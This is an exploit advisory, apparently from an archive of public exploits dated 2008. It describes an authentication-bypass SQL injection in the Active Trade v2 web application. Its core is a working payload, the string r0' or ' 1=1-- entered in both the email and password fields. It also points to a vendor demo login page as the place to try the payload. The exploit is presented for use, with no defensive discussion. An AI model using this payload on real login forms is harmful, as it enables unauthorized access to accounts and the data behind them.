id: 4304
date: 11/29/2008
title: Active Trade 2 (Auth Bypass) Remote SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

===============================================================
Active Trade 2 (Auth Bypass) Remote SQL Injection Vulnerability
===============================================================


 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.activewebsoftwares.com
   
 [~]Software: Active Trade v 2
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
   
 [~] Exploit:
   
  Email: r0' or ' 1=1--

  password: r0' or ' 1=1--
   
   
 [~]login 4 d3m0:
   
  http://www.activewebsoftwares.com/demoactivetrade/account.asp


 
 [~]--------------------------------------------------------------------------------



#  0day.today [2023-03-25]  #